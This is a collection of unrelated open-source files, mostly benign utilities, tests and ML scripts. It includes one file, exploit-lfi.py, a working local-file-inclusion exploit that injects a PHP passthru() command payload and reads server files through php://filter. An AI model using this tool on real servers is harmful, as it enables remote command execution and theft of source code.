      dependencies[current_project].append(results.group(1))
      continue
  # Change all dependencies clsid to name instead.
  for project in dependencies:
    # For each dependency in this project
    new_dep_array = []
    for dep in dependencies[project]:
      # Look for the project name matching this clsid
      for project_info in projects:
        if projects[project_info][1] == dep:
          new_dep_array.append(project_info)
    dependencies[project] = sorted(new_dep_array)
  return (projects, dependencies)
def PrintDependencies(projects, deps):
  """Print every project with its path and its resolved dependency names.

  `projects` maps project name -> [path, clsid]; `deps` maps project
  name -> list of dependency project names (as produced by
  ParseSolution).  Output is alphabetical by project name.

  Fix: the original used Python-2-only `print` statements; the
  parenthesized single-argument form behaves identically on 2 and 3.
  """
  print("---------------------------------------")
  print("Dependencies for all projects")
  print("---------------------------------------")
  print("-- --")
  for (project, dep_list) in sorted(deps.items()):
    print("Project : %s" % project)
    print("Path : %s" % projects[project][0])
    if dep_list:
      for dep in dep_list:
        print(" - %s" % dep)
    print("")
  print("-- --")
def PrintBuildOrder(projects, deps):
  """Print one possible build order for all projects.

  Walks projects alphabetically and lets BuildProject emit each project
  after its dependencies.

  Fix: the original used Python-2-only `print` statements; the
  parenthesized single-argument form behaves identically on 2 and 3.
  """
  print("---------------------------------------")
  print("Build order ")
  print("---------------------------------------")
  print("-- --")
  built = []
  for (project, dep_list) in sorted(deps.items()):
    if project not in built:
      BuildProject(project, built, projects, deps)
  print("-- --")
def main():
  """Parse the .sln file given as argv[1] and print its dependency table
  and a possible build order in a diff-friendly format."""
  # check if we have exactly 1 parameter.
  if len(sys.argv) != 2:
    print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
    return
  (projects, deps) = ParseSolution(sys.argv[1])
  PrintDependencies(projects, deps)
  PrintBuildOrder(projects, deps)
if __name__ == '__main__':
main()
| bsd-3-clause | Python | |
b01b2757e5bfd9835ce28e6d5e27137c7aa5075b | Add a small test script to call individual methods of a driver | Vauxoo/stoqdrivers,stoq/stoqdrivers,vauxoo-dev/stoqdrivers,stoq/stoqdrivers | tools/testdriver.py | tools/testdriver.py | # -*- Mode: Python; coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2007 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307,
## USA.
##
## Author(s): Johan Dahlin <jdahlin@async.com.br>
##
import optparse
import sys
from kiwi.python import namedAny
from stoqdrivers.devices.serialbase import SerialPort
def main(args):
    """Instantiate the driver selected by -t/-b/-m and call one of its methods.

    Command line shape: [prog] [options] command [int args...].  The driver
    class is looked up by dotted name (stoqdrivers.devices.<type>.<brand>.
    <model>.<model>), attached to the serial port from -p, and `command`
    is invoked with the remaining arguments converted to int.  Returns 0.
    """
    usage = "usage: %prog [options] command [args]"
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('-t', '--type',
                      action="store",
                      dest="type",
                      default="printers",
                      help='Device type')
    parser.add_option('-b', '--brand',
                      action="store",
                      dest="brand",
                      help='Device brand')
    parser.add_option('-m', '--model',
                      action="store",
                      dest="model",
                      help='Device model')
    parser.add_option('-p', '--port',
                      action="store",
                      dest="port",
                      default="/dev/ttyS0",
                      help='Printer port')
    options, args = parser.parse_args(args)
    if len(args) < 2:
        raise SystemExit("Need a command")
    driver = namedAny('stoqdrivers.devices.%s.%s.%s.%s' % (
        options.type, options.brand, options.model, options.model))
    device = driver(port=SerialPort(options.port))
    command = args[1]
    # Resolve the requested method on the device and call it with int args.
    cb = getattr(device, command)
    args = map(int, tuple(args[2:]))
    retval = cb(*args)
    if retval is not None:
        print '%s returned: %r' % (command, retval)
    return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| lgpl-2.1 | Python | |
fb08ad77a821d86a3049628d907577949d525dac | Add unittests to test environment.py methods | Telefonica/toolium,Telefonica/toolium,Telefonica/toolium | toolium/test/behave/test_environment.py | toolium/test/behave/test_environment.py | # -*- coding: utf-8 -*-
u"""
Copyright 2016 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import mock
from ddt import ddt, data, unpack
from nose.tools import assert_equal
from toolium.behave.environment import get_jira_key_from_scenario
tags = (
(["jira('PROJECT-32')"], 'PROJECT-32'),
(["jira=PROJECT-32"], 'PROJECT-32'),
(["jira(PROJECT-32)"], 'PROJECT-32'),
(["jira='PROJECT-32'"], 'PROJECT-32'),
(["jiraPROJECT-32"], 'PROJECT-32'),
(["jira"], None),
(["PROJECT-32"], None),
(['slow', "jira('PROJECT-32')", 'critical'], 'PROJECT-32'),
(['slow', "PROJECT-32", 'critical'], None),
(['slow', "jira('PROJECT-32')", "jira('PROJECT-33')"], 'PROJECT-32'),
)
@ddt
class EnvironmentTests(unittest.TestCase):
    """Data-driven tests for get_jira_key_from_scenario; one test per
    (tag_list, expected_jira_key) pair in the module-level `tags` table."""
    @data(*tags)
    @unpack
    def test_get_jira_key_from_scenario(self, tag_list, jira_key):
        """A mocked behave scenario with `tag_list` must yield `jira_key` (or None)."""
        scenario = mock.Mock()
        scenario.tags = tag_list
        # Extract Jira key and compare with expected key
        assert_equal(jira_key, get_jira_key_from_scenario(scenario))
| apache-2.0 | Python | |
032876577fa94e2d9ca668d6fe108d725696088b | add 20newsgroups/ml.py | arosh/ml | 20newsgroups/ml.py | 20newsgroups/ml.py | from __future__ import division, print_function, unicode_literals
import numpy
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.preprocessing import StandardScaler
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import SGDClassifier
from sklearn.svm import LinearSVC
from sklearn.grid_search import RandomizedSearchCV
def best_cv_num(n):
    """Heuristic number of cross-validation folds for ``n`` samples:
    1 + log2(n), truncated to an int."""
    folds = numpy.log2(n) + 1
    return int(folds)
def best_n_iter(n):
    """Heuristic SGD iteration count so that roughly 10**6 samples are
    seen in total: ceil(1e6 / n)."""
    passes = 10 ** 6 / n
    return numpy.ceil(passes)
if __name__ == '__main__':
d = fetch_20newsgroups_vectorized(
remove=('headers', 'footers', 'quotes'))
X = d.data
X = StandardScaler(with_mean=False).fit_transform(X)
#X = TruncatedSVD(n_components=400).fit_transform(X)
y = d.target
_n = X.shape[0]
#clf = MultinomialNB()
#params = {
# 'alpha': numpy.linspace(0,0.1,1000)
#}
# http://scikit-learn.org/stable/modules/sgd.html#tips-on-practical-use
#clf = SGDClassifier(n_iter=best_n_iter(_n))
#params = {
# 'alpha': 10**numpy.linspace(-7,-1)
#}
clf = LinearSVC()
params = {
'C': 2**numpy.linspace(-3,3)
}
cv = RandomizedSearchCV(clf, params, n_iter=20, cv=best_cv_num(_n), n_jobs=-1, verbose=3)
cv.fit(X, y)
print(cv.best_score_)
print(cv.best_params_)
| mit | Python | |
63a0a0347272b2ae19f9caa5200aca5c03d67bab | add userselfinfo | OmegaEinstein/opsdev,OmegaEinstein/opsdev | api/user.py | api/user.py | #coding:utf-8
from flask import Flask
from . import app, jsonrpc
import json
from auth import auth_login
@jsonrpc.method('user.getinfo')
@auth_login
def userselfinfo(auth_info, **kwargs):
    """Return the authenticated user's profile as a JSON string.

    Resolves the user's role ids (`r_id`, comma separated) to role names,
    and the roles' power ids (`p_id`) to a mapping of power name ->
    {'name_cn': ..., 'url': ...}.  Returns {'code': 0, 'user': ...} on
    success, {'code': 1, 'errmsg': ...} on any lookup failure.
    """
    username = auth_info['username']
    fields = ['id','username','name','email','mobile','is_lock','r_id']
    try:
        user = app.config['db'].get_one_result('user', fields, where={'username':username})
        if user.get('r_id', None):
            r_id = user['r_id'].split(',')
            rids = app.config['db'].get_results('role', ['id','name','p_id'], where={'id': r_id})
        else:
            rids = {}
        pids = []
        for x in rids:
            pids += x['p_id'].split(',')
        # Deduplicate: union of power ids over all of the user's roles.
        pids = list(set(pids))
        user['r_id'] = [x['name'] for x in rids]
        if pids:
            # Resolve power ids to names.  Result format:
            # {'git': {'name_cn': 'git', 'url': 'http://git.com'}, ...}
            mypids = app.config['db'].get_results('power', ['id', 'name', 'name_cn', 'url'], where={'id': pids})
            user['p_id'] = dict([(str(x['name']), dict([(k, x[k]) for k in ('name_cn','url')])) for x in mypids])
        else:
            user['p_id'] = {}
        return json.dumps({'code':0, 'user':user})
    except Exception:
        # A bare `except:` would also swallow SystemExit/KeyboardInterrupt;
        # limit the catch-all to ordinary errors.
        return json.dumps({'code':1, 'errmsg':"get userinfo failed"})
| mit | Python | |
c43000d2f9ec20a1c0cdbbec86270d88acb36104 | Add implementation of more generic store calls | ktbs/ktbs-bench,ktbs/ktbs-bench | bench_examples/sparqlstore.py | bench_examples/sparqlstore.py | from ktbs_bench.graph_store import GraphStore
import rdflib
rdflib.plugin.register('BN', rdflib.store.Store, 'ktbs_bench.bnsparqlstore', 'SPARQLUpdateStore')
def get_sparqlstore(query_endpoint, update_endpoint, identifier="http://localhost/generic_sparqlstore/"):
    """Build a GraphStore backed by the registered 'BN' SPARQLUpdateStore plugin.

    The two endpoint URLs are passed through as the store's
    'configuration' connect argument (query endpoint first).
    """
    triple_store = GraphStore(store='BN', identifier=identifier,
                              connect_args={'configuration': (query_endpoint, update_endpoint)})
    return triple_store
| mit | Python | |
a6c96caa1392868402be9f89db034ef664a12bda | Add open time range support. | google/ctfscoreboard,google/ctfscoreboard,google/ctfscoreboard,google/ctfscoreboard | utils.py | utils.py | import datetime
import flask
import functools
from app import app
# Use dateutil if available
try:
from dateutil import parser as dateutil
except ImportError:
dateutil = None
class GameTime(object):
    """Class-level holder for the game's open/close window (read from
    app config GAME_TIME); all times are naive UTC datetimes."""
    @classmethod
    def setup(cls):
        """Get start and end time."""
        cls.start, cls.end = app.config.get('GAME_TIME', (None, None))
        # Config values may be date strings; parse them once up front.
        # (`basestring` makes this Python-2-only code.)
        if isinstance(cls.start, basestring):
            cls.start = cls._parsedate(cls.start)
        if isinstance(cls.end, basestring):
            cls.end = cls._parsedate(cls.end)
    @classmethod
    def countdown(cls, end=False):
        """Time remaining to start or end."""
        until = cls.end if end else cls.start
        if until is None:
            return None
        # May be negative once the boundary has passed.
        return until - datetime.datetime.utcnow()
    @classmethod
    def open(cls, after_end=False):
        """Is the game open? If after_end, keeps open."""
        now = datetime.datetime.utcnow()
        if cls.start and cls.start > now:
            return False
        if after_end:
            return True
        if cls.end and cls.end < now:
            return False
        return True
    @classmethod
    def require_open(cls, f, after_end=False):
        # Decorator: allow the view only while the game is open, else 403.
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            if cls.open(after_end):
                return f(*args, **kwargs)
            flask.abort(403)
        return wrapper
    @staticmethod
    def _parsedate(datestr):
        # Prefer dateutil when importable (see module-level try/import).
        if dateutil:
            return dateutil.parse(datestr)
        # TODO: parse with strptime
        raise RuntimeError('No parser available.')
# Initialize the window at import time and expose the decorator alias.
GameTime.setup()
require_gametime = GameTime.require_open
@app.context_processor
def util_contexts():
    # Make `gametime` available inside all templates.
    return dict(gametime=GameTime)
| apache-2.0 | Python | |
135645a91d08267a0cc04b5c5840ac9c84af03b5 | Add pytorch_CAM.py file for Lecture 05 | jastarex/DeepLearningCourseCodes,jastarex/DeepLearningCourseCodes | 05_Image_recognition_and_classification/pytorch_CAM.py | 05_Image_recognition_and_classification/pytorch_CAM.py | # simple implementation of CAM in PyTorch for the networks such as ResNet, DenseNet, SqueezeNet, Inception
import io
import requests
from PIL import Image
from torchvision import models, transforms
from torch.autograd import Variable
from torch.nn import functional as F
import numpy as np
import cv2
# input image
LABELS_URL = 'https://s3.amazonaws.com/outcome-blog/imagenet/labels.json'
IMG_URL = 'http://media.mlive.com/news_impact/photo/9933031-large.jpg'
# networks such as googlenet, resnet, densenet already use global average pooling at the end, so CAM could be used directly.
model_id = 1
if model_id == 1:
net = models.squeezenet1_1(pretrained=True)
finalconv_name = 'features' # this is the last conv layer of the network
elif model_id == 2:
net = models.resnet18(pretrained=True)
finalconv_name = 'layer4'
elif model_id == 3:
net = models.densenet161(pretrained=True)
finalconv_name = 'features'
net.eval()
# hook the feature extractor
features_blobs = []
def hook_feature(module, input, output):
    # Forward hook: stash this layer's output feature maps (as a numpy
    # array) into the module-level features_blobs list for CAM computation.
    features_blobs.append(output.data.cpu().numpy())
net._modules.get(finalconv_name).register_forward_hook(hook_feature)
# get the softmax weight
params = list(net.parameters())
weight_softmax = np.squeeze(params[-2].data.numpy())
def returnCAM(feature_conv, weight_softmax, class_idx):
    """Compute one class activation map per requested class, upsampled to 256x256.

    feature_conv: conv feature maps of shape (bz, nc, h, w) -- assumes the
        batch holds a single image (only its maps are used).  TODO confirm.
    weight_softmax: classifier weight matrix, one row of nc weights per class.
    class_idx: iterable of class indices to render.

    Fix: the loop previously indexed `weight_softmax[class_idx]` (the whole
    list) instead of `weight_softmax[idx]`, which only happened to work when
    a single class index was requested and broke for several classes.
    """
    size_upsample = (256, 256)
    bz, nc, h, w = feature_conv.shape
    output_cam = []
    for idx in class_idx:
        # Weighted sum of the nc feature maps for this class.
        cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))
        cam = cam.reshape(h, w)
        # Normalize to [0, 255] so it can be rendered as an image.
        cam = cam - np.min(cam)
        cam_img = cam / np.max(cam)
        cam_img = np.uint8(255 * cam_img)
        output_cam.append(cv2.resize(cam_img, size_upsample))
    return output_cam
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
preprocess = transforms.Compose([
transforms.Scale((224,224)),
transforms.ToTensor(),
normalize
])
response = requests.get(IMG_URL)
img_pil = Image.open(io.BytesIO(response.content))
img_pil.save('test.jpg')
img_tensor = preprocess(img_pil)
img_variable = Variable(img_tensor.unsqueeze(0))
logit = net(img_variable)
# download the imagenet category list
classes = {int(key):value for (key, value)
in requests.get(LABELS_URL).json().items()}
h_x = F.softmax(logit).data.squeeze()
probs, idx = h_x.sort(0, True)
# output the prediction
for i in range(0, 5):
print('{:.3f} -> {}'.format(probs[i], classes[idx[i]]))
# generate class activation mapping for the top1 prediction
CAMs = returnCAM(features_blobs[0], weight_softmax, [idx[0]])
# render the CAM and output
print('output CAM.jpg for the top1 prediction: %s'%classes[idx[0]])
img = cv2.imread('test.jpg')
height, width, _ = img.shape
heatmap = cv2.applyColorMap(cv2.resize(CAMs[0],(width, height)), cv2.COLORMAP_JET)
result = heatmap * 0.3 + img * 0.5
cv2.imwrite('CAM.jpg', result)
| apache-2.0 | Python | |
a11a32f754a356dfc008e69b62d930af3754aec4 | Add : LFI Exploit tool | m101/m101-tools | exploit-lfi.py | exploit-lfi.py | #!/usr/bin/python
import argparse
import base64
import re
import requests
import sys
def scrap_results(content):
    """Collect the lines delimited by the STARTSTART and ENDEND markers.

    Anything before (and including) STARTSTART and after (and including)
    ENDEND is stripped; empty lines inside the delimited region are
    dropped.  Returns the captured lines as a list, or [] when no
    STARTSTART marker is found.
    """
    captured = []
    inside = False
    finished = False
    for raw in content.split('\n'):
        if inside and finished:
            break
        text = raw
        if not inside and 'STARTSTART' in text:
            text = re.sub('.*STARTSTART', '', text)
            inside = True
        if inside and not finished and 'ENDEND' in text:
            text = re.sub('ENDEND.*', '', text)
            finished = True
        if inside and text:
            captured.append(text)
    return captured
# Extract every base64-looking token and decode the valid ones.
def scrap_b64str(content):
    """Find base64-looking tokens (16+ chars of the base64 alphabet, '='
    padded) in `content` and return their decodings.

    Tokens that decode cleanly are returned decoded; tokens that fail to
    decode but still end in '=' are kept verbatim.  Empty decodings are
    dropped.
    """
    pattern = re.compile('[A-Za-z0-9+/=]{16,}=+')
    decoded_words = []
    for token in pattern.findall(content):
        keep = True
        value = ''
        try:
            value = base64.b64decode(token)
        except Exception:
            keep = False
        if not keep and re.search('=+$', token):
            # Not valid base64, but padded like one -- keep the raw token.
            value = token
            keep = True
        if keep and len(value) != 0:
            decoded_words.append(value)
    return decoded_words
parser = argparse.ArgumentParser(description='Exploit LFI')
parser.add_argument('--url', '-u', nargs=1, type=str, help='URL to attack', required=True)
parser.add_argument('--arg', '-a', nargs=1, type=str, help='Technique argument', required=True)
parser.add_argument('--technique', '-t', nargs=1, default='env', help='input, env or read')
args = parser.parse_args ()
payload = '<?php echo "STARTSTART"; passthru ("{0}"); echo "ENDEND"; ?>'.format (args.arg[0])
if args.technique[0] == 'input':
form = {
'' : payload
}
filename = 'php://input'
url = args.url[0].replace ('PAYLOAD', filename)
req = requests.get (url, data=form)
# print result
results = scrap_results (req.text)
for result in results:
print result
elif args.technique[0] == 'read':
php_filter = 'php://filter/convert.base64-encode/resource=' + args.arg[0]
url = args.url[0].replace ('PAYLOAD', php_filter)
req = requests.get (url)
# print result
results = scrap_b64str (req.text)
for result in results:
print result
else:
headers = {
'User-Agent' : payload
}
filename = '/proc/self/environ'
url = args.url[0].replace ('PAYLOAD', filename)
print url
req = requests.get (url, headers=headers)
# print result
results = scrap_results (req.text)
for result in results:
print result
| agpl-3.0 | Python | |
70f48f8b72a49929ddba7908fd47175fd4c1685d | add yarn support (test failing) | Ron89/thesaurus_query.vim | autoload/thesaurus_query/backends/yarn_synsets_lookup.py | autoload/thesaurus_query/backends/yarn_synsets_lookup.py | # Thesaurus Lookup routine for local synsets.csv file.
# Author: HE Chong [[chong.he.1989@gmail.com][E-mail]]
'''
Lookup routine for local mthesaur.txt file. When query_from_source is called, return:
[status, [[def_0, [synonym_0, synonym_1, ...]], [def_1, [synonym_0, synonym_1, ...]], ...]]
status:
0: normal, synonym found, list will be returned as
1: normal, synonym not found, return empty synonym list
-1: unexpected result from query, return empty synonym list
synonym list = [def, list wordlist]
def('str'): definition the synonyms belong to
wordlist = [synonym_0, synonym_1, ...]: list of words belonging to a same definition
'''
import os
from ..tq_common_lib import decode_utf_8, get_variable
identifier="yarn_synsets"
language="ru"
def query(word):
    """Look up `word` in the local yarn synsets CSV.

    Returns [status, [[definition, [synonym, ...]], ...]] with status
    0 (synonyms found), 1 (none found) or -1 (synsets file missing),
    matching the contract described in the module docstring.
    """
    _synsets_valid , _synsets_file = _synsets_file_locate()
    if not _synsets_valid:
        return [-1, []]
    match_found = 0  # NOTE(review): unused leftover
    # NOTE(review): the file handle is never closed explicitly.
    thesaur_file = open(os.path.expanduser(_synsets_file), 'r')
    found_synList=[]
    while True:
        line_curr=decode_utf_8(thesaur_file.readline())
        if not line_curr:
            break
        # CSV row layout: <id?>,<';'-joined synonyms>,<grammar>,<domain>
        line_data = line_curr.rstrip().split(u',')
        synonym_list = line_data[1].split(u';')
        # NOTE(review): split() always returns >= 1 element, so this branch
        # is always taken; malformed rows raise IndexError on [1]/[2]/[3].
        if len(line_data):
            grammar = "{0}, ".format(line_data[2])
        else:
            grammar = ""
        wordDomain = line_data[3]
        if word in synonym_list:
            # Drop the queried word itself from its own synonym list.
            synonym_list.remove(word)
        else:
            continue
        if len(synonym_list):
            found_synList.append([
                u"{0}{1}".format(grammar, wordDomain), synonym_list])
    return [0 if len(found_synList) else 1, found_synList]
def _synsets_file_locate():
    """Return (True, path) when the configured yarn synsets CSV exists,
    (False, None) otherwise.  Path comes from the `yarn_synsets_file`
    variable with a ~/.vim default."""
    verified_file = get_variable(
            "yarn_synsets_file",
            "~/.vim/thesaurus/yarn_synsets.csv")
    if os.path.exists(os.path.expanduser(verified_file)):
        return (True, verified_file)
    return (False, None)
# initiation ------------
_synsets_file_locate()
| apache-2.0 | Python | |
b036acb164bc0efce18299341b04a7acf226c7db | solve pep_745 | filippovitale/pe,filippovitale/pe,filippovitale/pe,filippovitale/pe | pe-solution/src/main/python/pep_745.py | pe-solution/src/main/python/pep_745.py | from collections import defaultdict
from math import sqrt
MODULO = 1_000_000_007


def g_naive(n: int) -> int:
    """Return the largest perfect square dividing ``n``, reduced mod MODULO.

    Tries candidate squares from ``floor(sqrt(n))**2`` down to ``1``; the
    first divisor found is the maximum.  ``int(sqrt(n))`` can be off by one
    for very large ``n`` because of float rounding, so the starting root is
    corrected with exact integer arithmetic first.
    """
    upper = int(sqrt(n))
    # Correct float-rounding errors in sqrt() for large n.
    while upper * upper > n:
        upper -= 1
    while (upper + 1) * (upper + 1) <= n:
        upper += 1
    for root in range(upper, 0, -1):
        square = root * root
        if n % square == 0:
            return square % MODULO
def s_naive(nn: int) -> int:
    """Brute-force S(nn) = sum of g_naive(n) for n = 1..nn, reduced mod MODULO."""
    return sum([g_naive(n) for n in range(1, nn + 1)]) % MODULO
def solve(n: int) -> int:
    """Compute S(n) = sum over k=1..n of the largest square dividing k, mod MODULO.

    t[i] counts the integers k <= n whose largest square divisor is i*i:
    n // (i*i) counts all multiples of i*i, and the subtracted sum removes
    those already accounted for by a larger square (i*j)**2 (filled in
    because the loop runs from `upper` downward).  Each such k contributes
    i*i to the total.

    NOTE(review): int(sqrt(n)) relies on float precision; exact for the
    n used in __main__, but an integer square root would be safer.
    """
    upper = int(sqrt(n))
    t = defaultdict(int)
    for i in range(upper, 0, -1):
        t[i] = n // (i * i) - sum([t[i * j] for j in range(2, upper // i + 1)])
    return (sum([i * i * v for i, v in t.items()])) % MODULO
if __name__ == "__main__":
assert g_naive(18) == 9
assert g_naive(19) == 1
assert solve(10) == 24
assert solve(100) == 767
print(solve(10 ** 14))
| mit | Python | |
a59d07a5bfb9f32c37242fd8ffb06d0409896485 | add a welch periodogram tool | evandromr/python_scitools | welch.py | welch.py | #!/bin/env python
import numpy as np
import scipy.signal as ss
import astropy.io.fits as fits
import matplotlib.pyplot as plt
inpt = str(raw_input("Nome do Arquivo: "))
lc = fits.open(inpt)
bin = float(raw_input("bin size (or camera resolution): "))
# Convert to big-endian array is necessary to the lombscargle function
rate = np.array(lc[1].data["RATE"], dtype='float64')
time = np.array(lc[1].data["TIME"], dtype='float64')
time -= time.min()
# Exclue NaN values -------------------------
print ''
print 'Excluding nan and negative values...'
print ''
exclude = []
for i in xrange(len(rate)):
if rate[i] > 0:
pass
else:
exclude.append(i)
exclude = np.array(exclude)
nrate = np.delete(rate, exclude)
ntime = np.delete(time, exclude)
# --------------------------------------------
# normalize count rate
nrate -= nrate.mean()
# maximum frequecy limited by resolution
freqmax = 1.0/bin
# Ther periodogram itself
f, p = ss.welch(nrate, fs=freqmax, nperseg=len(nrate), nfft=10*len(nrate))
# Plot lightcurve on top panel
plt.subplot(2, 1, 1)
plt.plot(ntime, nrate, 'bo-')
plt.xlabel('Time [s]', fontsize=12)
plt.ylabel('Normalized Count Rate [counts/s]', fontsize=12)
# Plot powerspectrum on bottom panel
plt.subplot(2, 1, 2)
plt.plot(f, p, 'b.-', label='f = {0}'.format(f[np.argmax(p)]))
plt.xlabel('Frequency [Hz]', fontsize=12)
plt.ylabel('Power', fontsize=12)
plt.legend(loc='best')
# show plot
plt.show()
| mit | Python | |
f204c881aabb07dbe6f04008e0637dc4430ae8c8 | Add jon submission for problem 01 | lypnol/graph-theory | problem-01/submissions/jon.py | problem-01/submissions/jon.py | from submission import Submission
import collections
import random
class JonSubmission(Submission):
    """Graph-traversal submission: walks the whole connected component of
    the start node with a randomized DFS and returns the path taken."""
    def author(self):
        return 'jon'
    def run(self, input):
        """input is (graph, start) with graph as adjacency dict; returns the
        full list of visited positions (including backtracking steps)."""
        class Traveler(object):
            """Walker constrained to the graph's edges; records every move."""
            def __init__(self, graph, start_point):
                if start_point not in graph:
                    raise Exception("Start point not in the graph")
                self._graph = graph
                self._current = start_point
                self._history = [start_point]
            def possibilities(self):
                return self._graph[self._current]
            def goto(self, position):
                if position in self.possibilities():
                    self._current = position
                    self._history.append(position)
                else:
                    raise Exception("Not possible, try again.")
            def current(self):
                return self._current
            def step_count(self):
                return len(self._history) - 1
            def travel_path(self):
                return list(self._history)
        class ShuffledTraveler(Traveler):
            """Traveler whose neighbor order is randomized on each query."""
            def __init__(self, graph, start_point):
                super().__init__(graph, start_point)
            def possibilities(self):
                l = super().possibilities()[:]
                random.shuffle(l)
                return l
        def connected_component_using_shorter_dfs(traveler):
            """DFS with explicit backtracking; stops once every discovered
            node has been visited.  Returns the set of visited nodes."""
            visited = {traveler.current()}
            found = set(traveler.possibilities())
            found.add(traveler.current())
            path = [] # Path to the starting point
            while len(visited) < len(found):
                new_found = False
                for node in traveler.possibilities():
                    # Ignore already visited nodes to avoid loops !
                    if node not in visited:
                        path.append(traveler.current())
                        traveler.goto(node)
                        new_found = True
                        break
                if not new_found:
                    if len(path) > 0:
                        traveler.goto(path.pop())
                    else:
                        break
                visited.add(traveler.current())
                found.update(traveler.possibilities())
            return visited
        graph, start = input
        traveler = ShuffledTraveler(graph, start)
        connected_component_using_shorter_dfs(traveler)
        return traveler.travel_path()
| mit | Python | |
9999c27f5a6121d8488c14dd4a2b9843eef9cec9 | Add merge migration | aapris/linkedevents,City-of-Helsinki/linkedevents,City-of-Helsinki/linkedevents,aapris/linkedevents,aapris/linkedevents,City-of-Helsinki/linkedevents | events/migrations/0030_merge.py | events/migrations/0030_merge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-09-27 09:05
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Merge migration joining the 0028 and 0029 branches of `events`."""
    dependencies = [
        ('events', '0029_make_api_key_non_nullable'),
        ('events', '0028_add_photographer_name'),
    ]
    # No schema changes -- this migration only merges two leaf nodes.
    operations = [
    ]
| mit | Python | |
aa0e10116580ab013e911c2b14cf216a19716abd | Add schedule to static renderers | CTPUG/wafer,CTPUG/wafer,CarlFK/wafer,CarlFK/wafer,CTPUG/wafer,CarlFK/wafer,CarlFK/wafer,CTPUG/wafer | wafer/schedule/renderers.py | wafer/schedule/renderers.py | from django_medusa.renderers import StaticSiteRenderer
class ScheduleRenderer(StaticSiteRenderer):
    """django-medusa renderer: lists the URLs to snapshot for the schedule app."""
    def get_paths(self):
        paths = ["/schedule/", ]
        return paths
# Renderer classes picked up by django-medusa's static site generator.
renderers = [ScheduleRenderer, ]
| isc | Python | |
51d3dee22c3c563b486038edcd9f18fa02b46448 | Add new admin views to show how to use RBAC system | andreffs18/flask-template-project,andreffs18/flask-template-project,andreffs18/flask-template-project | project/admin/views.py | project/admin/views.py | from werkzeug.exceptions import HTTPException
from flask import Response, redirect
from flask_admin import BaseView, expose
from flask_admin.contrib.sqla import ModelView as DefaultModelView
from flask_login import login_required
from project.home.decorators import roles_required
class BasicAuthException(HTTPException):
    """HTTP 401 raised when basic-auth fails; carries a WWW-Authenticate
    challenge so the browser re-prompts for credentials."""
    def __init__(self, message):
        super().__init__(message, Response(
            "You could not be authenticated. Please refresh the page.", 401,
            {'WWW-Authenticate': 'Basic realm="Login Required"'}
        ))
class ModelView(DefaultModelView):
    """Flask-Admin SQLA model view protected by HTTP basic auth."""
    column_auto_select_related = True
    def __init__(self, model, session, basic_auth, *args, **kwargs):
        # `basic_auth` is the extension instance used for the access check.
        super(ModelView, self).__init__(model, session, *args, **kwargs)
        self.basic_auth = basic_auth
    def is_accessible(self):
        # Raising (rather than returning False) sends the 401 challenge
        # immediately instead of a plain "forbidden" page.
        if not self.basic_auth.authenticate():
            raise BasicAuthException('Not authenticated.')
        else:
            return True
    def inaccessible_callback(self, name, **kwargs):
        # Fallback: redirect into the basic-auth challenge flow.
        return redirect(self.basic_auth.challenge())
class SuperSecretPage(BaseView):
    """Example admin page gated by both login and the RBAC 'admin' role."""
    @expose(url="/", methods=("GET", ))
    @login_required
    @roles_required('admin')
    def secret(self):
        return self.render('admin/super-secret-page.html')
| mit | Python | |
46074336a9ffc8a566a88a8e70c37ca56635ff7d | Create app2.py | belmih/simpleworks | python/pla.rix/app2.py | python/pla.rix/app2.py | #!C:/Python35/python.exe
# -*- coding: UTF-8 -*-
#
# belmih 2016
#
from multiprocessing import Process, Queue, Lock
import os
import xml.etree.cElementTree as ET
import shutil
import zipfile
import time
import csv
import argparse
abspath = os.path.abspath(__file__)
workdir = os.path.dirname(abspath)
os.chdir(workdir)
CSV_ID_LEVEL = "id_level.csv"
CSV_ID_OBJECT = "id_object_name.csv"
UNZIPFOLDER = './unzip'
DELETEXML = True
# Create (or truncate) a CSV file containing only the header row.
def create_new_file(filename, fieldnames):
    """Write `fieldnames` as the single header row of `filename`."""
    with open(filename, 'w', newline='') as out:
        csv.writer(out).writerow(fieldnames)
def print_lock(message, lock):
    """Print `message` while holding `lock`, so output from concurrent
    workers is not interleaved."""
    with lock:
        print(message)
# Append one row to a CSV file under a lock.
def write_csv(filename, fieldnames, data, lock):
    """Append the `data` dict as one row of `filename`, serialized by `lock`."""
    with lock:
        with open(filename, 'a', newline='') as out:
            csv.DictWriter(out, dialect='excel', fieldnames=fieldnames).writerow(data)
def unzip_archive(item):
    """Extract zip archive `item` into ./unzip/<archive-basename>/ and
    return that folder path.

    NOTE(review): ZipFile.extract() re-creates each member's internal
    directory path under the target, so nested members land under a
    doubled directory (e.g. unzip/x/a/a/b.xml).  The later os.walk still
    finds them, but confirm this layout is intended.
    """
    tmpfoldername = os.path.basename(item).split('.')[0]
    tmpfolderpath = os.path.join('unzip', tmpfoldername)
    zfile = zipfile.ZipFile(item)
    for name in zfile.namelist():
